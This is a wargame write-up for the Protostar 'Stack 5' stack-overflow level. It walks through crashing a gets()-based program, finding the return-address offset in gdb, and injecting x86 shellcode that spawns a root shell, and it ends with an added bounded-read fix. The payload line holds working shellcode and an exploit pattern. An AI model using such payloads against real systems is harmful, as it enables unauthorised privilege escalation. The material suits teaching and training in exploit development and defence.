Protostar - Stack 5
Wargame/Exploit-Exercises 2014. 5. 19. 11:24
1. Problem Source
    #include <stdlib.h>
    #include <unistd.h>
    #include <stdio.h>
    #include <string.h>

    int main(int argc, char **argv)
    {
      char buffer[64];

      gets(buffer);
    }
2. Solution
    user@protostar:~$ cp /opt/protostar/bin/stack5 ./
    user@protostar:~$ ls
    stack5
    user@protostar:~$ ulimit -c unlimited
    user@protostar:~$ python -c "print 'A'*76 + '\xcc\xcc\xcc\xcc' + 'C'*100" | ./stack5
    Segmentation fault (core dumped)
    user@protostar:~$ gdb -q -c /tmp/core.11.stack5.1962
    Core was generated by `./stack5'.
    Program terminated with signal 11, Segmentation fault.
    #0  0xcccccccc in ?? ()
    (gdb) i reg
    eax            0xbffff7c0       -1073743936
    ecx            0xbffff7c0       -1073743936
    edx            0xb7fd9334       -1208118476
    ebx            0xb7fd7ff4       -1208123404
    esp            0xbffff810       0xbffff810
    ebp            0x41414141       0x41414141
    esi            0x0      0
    edi            0x0      0
    eip            0xcccccccc       0xcccccccc
    eflags         0x10246  [ PF ZF IF RF ]
    cs             0x73     115
    ss             0x7b     123
    ds             0x7b     123
    es             0x7b     123
    fs             0x0      0
    gs             0x33     51
    (gdb) x/x $esp
    0xbffff810:     0x43434343
    (gdb) x/s $esp
    0xbffff810:      'C' <repeats 100 times>
    user@protostar:/opt/protostar/bin$ python -c "print 'A'*76 + '\x10\xf8\xff\xbf' + '\x90'*20 + '\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80'" | ./stack5
    # whoami
    root
    # id
    uid=1001(user) gid=1001(user) euid=0(root) groups=0(root),1001(user)
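The root cause in the problem source is the unbounded gets(buffer) into a 64-byte stack buffer, which is why 76 bytes of padding reach the saved return address in the session above. As an added example (not part of the original post or of Protostar), here is a bounded replacement for that call; read_line_bounded and the line_status names are hypothetical.

```c
#include <limits.h>
#include <stdio.h>
#include <string.h>

enum line_status { LINE_OK, LINE_EOF, LINE_TOO_LONG, LINE_BAD_ARG };

/* Hypothetical helper (not from the original post): read one line into
 * buf, whose capacity cap includes the terminating NUL. Unlike gets(),
 * it never writes past buf[cap - 1]. An overlong line is rejected whole
 * and its tail is drained, so the leftover bytes are not mistaken for
 * the next line of input. */
enum line_status read_line_bounded(FILE *in, char *buf, size_t cap)
{
    if (in == NULL || buf == NULL || cap < 2 || cap > (size_t)INT_MAX)
        return LINE_BAD_ARG;
    if (fgets(buf, (int)cap, in) == NULL) {   /* EOF or read error */
        buf[0] = '\0';
        return LINE_EOF;
    }
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';          /* complete line: strip the newline */
        return LINE_OK;
    }
    /* No newline stored: the line either ended exactly at the limit (or
     * at EOF), or it was truncated. Peek at the next byte to tell. */
    int c = fgetc(in);
    if (c == EOF || c == '\n')
        return LINE_OK;
    while (c != EOF && c != '\n')     /* discard the rest of the long line */
        c = fgetc(in);
    buf[0] = '\0';
    return LINE_TOO_LONG;
}

int main(void)
{
    char buffer[64];                  /* same size as the buffer in stack5 */
    switch (read_line_bounded(stdin, buffer, sizeof buffer)) {
    case LINE_OK:
        printf("accepted %zu bytes\n", strlen(buffer));
        return 0;
    case LINE_TOO_LONG:
        fputs("rejected: input exceeds 63 bytes\n", stderr);
        return 1;
    default:
        return 1;
    }
}
```

Fed the 180-byte input from the crash test above, this version exits with status 1 and the saved frame pointer and return address are never written.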